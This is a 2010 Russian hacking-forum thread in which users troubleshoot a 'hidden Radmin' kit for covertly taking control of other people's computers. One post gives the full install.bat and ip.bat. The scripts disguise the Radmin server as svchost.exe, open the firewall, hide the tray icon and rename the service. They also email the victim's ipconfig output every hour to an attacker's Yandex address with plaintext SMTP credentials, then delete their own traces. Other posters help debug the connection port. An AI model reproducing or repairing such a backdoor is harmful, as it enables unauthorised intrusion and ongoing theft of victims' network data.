Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Для новичков > Взлом компьютеров
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Взлом компьютеров Проникновение на удаленные компьютеры и серверы. Получение доступа к чужой системе.

Ответ
 
Опции темы
Старый 08.07.2010, 23:47   #21
Stierlitz
advanced 
 
Аватар для Stierlitz
 
Регистрация: 29.05.2009
Прописка: я в твоих мыслях...
Сообщений: 391
Вес репутации: 8 Stierlitz пользователь
Депозит: 0$
Вы сказали Спасибо: 105
Поблагодарили 65 раз(а) в 52 сообщениях
Кто нить проверял вообще работу этого скрытого радмина с ачата? IP на почту приходит, процесс радмин-сервера запускается, но коннекта НЕТ. Проверял в тех же условиях , на тех же компах, официальная версия с сайта работает. Если просто в ручную запустить файл радмин-сервера без батника, то конектится, запрашивает пароль, но т.к. пароль не задан, то неизвестно какой пароль вводить.

Сладкий алкоголь растворяет боль.
Stierlitz вне форума   Ответить с цитированием
Старый 09.07.2010, 18:51   #22
Damir
user 
 
Аватар для Damir
 
Регистрация: 04.01.2010
Сообщений: 63
Вес репутации: 2 Damir новичек
Депозит: 0$
Вы сказали Спасибо: 20
Поблагодарили 2 раз(а) в 2 сообщениях
Цитата:
Сообщение от Stierlitz Посмотреть сообщение
Кто нить проверял вообще работу этого скрытого радмина с ачата? IP на почту приходит, процесс радмин-сервера запускается, но коннекта НЕТ. Проверял в тех же условиях , на тех же компах, официальная версия с сайта работает. Если просто в ручную запустить файл радмин-сервера без батника, то конектится, запрашивает пароль, но т.к. пароль не задан, то неизвестно какой пароль вводить.
Проверял к компу не коннектится.
Ip приходит в том случае если только после распаковки зайти в то место куда распаковалось и запустить файл ip.bat.
по мне кажется что не работает этот скрытый радмин с ачата.
вот тема где я писал о проблеме но никто не ответил(

добавлено через 4 минуты
Кстати вот сообщения так приходят каждый час
Настройка протокола IP для Windows

Имя компьютера . . . . . . . . . : pc
Основной DNS-суффикс . . . . . . :
Тип узла. . . . . . . . . . . . . : неизвестный
IP-маршрутизация включена . . . . : да
WINS-прокси включен . . . . . . . : нет
Порядок просмотра суффиксов DNS . : integral-net.spb.ru

Локальная сеть - Ethernet адаптер:

DNS-суффикс этого подключения . . :
Описание . . . . . . . . . . . . : 3Com 3C905TX-based Ethernet адаптер (универсальный)
Физический адрес. . . . . . . . . : 00-60-08-2B-C9-65
Dhcp включен. . . . . . . . . . . : нет
IP-адрес . . . . . . . . . . . . : 192.168.0.1
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . :
DNS-серверы . . . . . . . . . . . : 88.201.176.2
88.201.160.2

Интернет - Ethernet адаптер:

DNS-суффикс этого подключения . . : integral-net.spb.ru
Описание . . . . . . . . . . . . : Realtek RTL8139 Family PCI Fast Ethernet NIC
Физический адрес. . . . . . . . . : 00-E0-45-69-01-16
Dhcp включен. . . . . . . . . . . : да
Автонастройка включена . . . . . : да
IP-адрес . . . . . . . . . . . . : 10.37.255.56
Маска подсети . . . . . . . . . . : 255.255.252.0
Основной шлюз . . . . . . . . . . : 10.37.252.1
DHCP-сервер . . . . . . . . . . . : 10.37.255.254
DNS-серверы . . . . . . . . . . . : 88.201.176.2
88.201.160.2
Аренда получена . . . . . . . . . : 9 июля 2010 г. 9:05:15
Аренда истекает . . . . . . . . . : 10 июля 2010 г. 9:05:15

vpn.integral-net.spb.ru - PPP адаптер:

DNS-суффикс этого подключения . . :
Описание . . . . . . . . . . . . : WAN (PPP/SLIP) Interface
Физический адрес. . . . . . . . . : 00-53-45-00-00-00
Dhcp включен. . . . . . . . . . . : нет
IP-адрес . . . . . . . . . . . . : 88.201.179.235
Маска подсети . . . . . . . . . . : 255.255.255.255
Основной шлюз . . . . . . . . . . : 88.201.179.235
DNS-серверы . . . . . . . . . . . : 88.201.176.2
88.201.160.2

Последний раз редактировалось Damir, 09.07.2010 в 18:56. Причина: Добавлено сообщение
Damir вне форума   Ответить с цитированием
Старый 09.07.2010, 20:39   #23
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
Цитата:
IP на почту приходит, процесс радмин-сервера запускается, но коннекта НЕТ
Проверьте порт в настройках и порт к которому подключаетесь!
Проверьте правильность ввода пароля!
==================
Цитата:
Кстати вот сообщения так приходят каждый час
Эти сообщения берутся вот отсюда:
Код:
ipconfig /all
И сохраняются сюда:
Код:
%systemroot%/system32/rm/ip.txt
далее оправляются на мыло

HackersOfTrue! Хакеры правды! (C) Kanaris
SoftHack вне форума   Ответить с цитированием
Благодарности SoftHack от:
Старый 09.07.2010, 23:03   #24
Damir
user 
 
Аватар для Damir
 
Регистрация: 04.01.2010
Сообщений: 63
Вес репутации: 2 Damir новичек
Депозит: 0$
Вы сказали Спасибо: 20
Поблагодарили 2 раз(а) в 2 сообщениях
Цитата:
Сообщение от SoftHack Посмотреть сообщение
Проверьте порт в настройках и порт к которому подключаетесь!
Проверьте правильность ввода пароля!
==================

Эти сообщения берутся вот отсюда:
Код:
ipconfig /all
И сохраняются сюда:
Код:
%systemroot%/system32/rm/ip.txt
далее оправляются на мыло
Но вот под коннектится не получается пишет сервер не отвечает!
Damir вне форума   Ответить с цитированием
Старый 10.07.2010, 16:53   #25
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
Цитата:
Сообщение от Damir Посмотреть сообщение
Но вот под коннектится не получается пишет сервер не отвечает!
Значит что-то неправильно настроил
Конфиги покажи что ли
P.S. Так же почитай про другой способ в первом посте
начинается со строк
Код:
Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.

HackersOfTrue! Хакеры правды! (C) Kanaris
SoftHack вне форума   Ответить с цитированием
Старый 10.07.2010, 21:24   #26
Damir
user 
 
Аватар для Damir
 
Регистрация: 04.01.2010
Сообщений: 63
Вес репутации: 2 Damir новичек
Депозит: 0$
Вы сказали Спасибо: 20
Поблагодарили 2 раз(а) в 2 сообщениях
это install.bat
cmdow @ /HID

md "%SYSTEMROOT%/system32/rm"

copy /y "blat.exe" "%SYSTEMROOT%/system32/rm/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/rm/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/rm/blat.dll
copy /y "ip.bat" "%SYSTEMROOT%/system32/rm/ip.bat"
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /silence /pass:******/port:4889 /save
"%SYSTEMROOT%/svchost.exe" /start

%SYSTEMROOT%/system32/rm/blat.exe -install -server smtp.yandex.ru -port 587 -f suppyrt@yandex.ru -u suppyrt-pw 727753

ipconfig /all > %systemroot%/system32/rm/ip.txt

blat.exe %systemroot%/system32/rm/ip.txt -to xtusx@yandex.ru.

schtasks /create /tn "security" /sc minute /mo 60 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32/rm\ip.bat


del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del ip.bat
del install.bat
Вот ip.bat
cmdow @ /HID

%SYSTEMROOT%/system32/rm/blat.exe -install -server smtp.yandex.ru -port 587 -f suppyrt@yandex.ru -u suppyrt -pw 727753

ipconfig /all > %systemroot%/system32/rm/ip.txt

blat.exe %systemroot%/system32/rm/ip.txt -to xtusx@yandex.ru.

добавлено через 10 минут
модеры закройте звездами пассы))плыз

Последний раз редактировалось Damir, 10.07.2010 в 21:34. Причина: Добавлено сообщение
Damir вне форума   Ответить с цитированием
Старый 10.07.2010, 23:45   #27
Stierlitz
advanced 
 
Аватар для Stierlitz
 
Регистрация: 29.05.2009
Прописка: я в твоих мыслях...
Сообщений: 391
Вес репутации: 8 Stierlitz пользователь
Депозит: 0$
Вы сказали Спасибо: 105
Поблагодарили 65 раз(а) в 52 сообщениях
Цитата:
port:4889
Когда подключаешься через виевер, этот порт пишешь, или оставляешь стандартный? Если что по умолчанию порт 4899.

Сладкий алкоголь растворяет боль.
Stierlitz вне форума   Ответить с цитированием
Старый 18.07.2010, 13:35   #28
Damir
user 
 
Аватар для Damir
 
Регистрация: 04.01.2010
Сообщений: 63
Вес репутации: 2 Damir новичек
Депозит: 0$
Вы сказали Спасибо: 20
Поблагодарили 2 раз(а) в 2 сообщениях
Цитата:
Сообщение от Damir Посмотреть сообщение
"%SYSTEMROOT%/svchost.exe" /silence /pass:******/port:4889 /save
пишешь порт который тут указал ну у меня он станадартный!
Damir вне форума   Ответить с цитированием
Старый 18.07.2010, 14:10   #29
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
измени в коде порт на: 4899

HackersOfTrue! Хакеры правды! (C) Kanaris
SoftHack вне форума   Ответить с цитированием
Старый 24.09.2010, 11:15   #30
sergeiru02
newbie 
 
Регистрация: 05.09.2010
Сообщений: 3
Вес репутации: 0 sergeiru02 новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Radmin Viewer удалён с депозита.И где теперь его искать
sergeiru02 вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 01:46.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru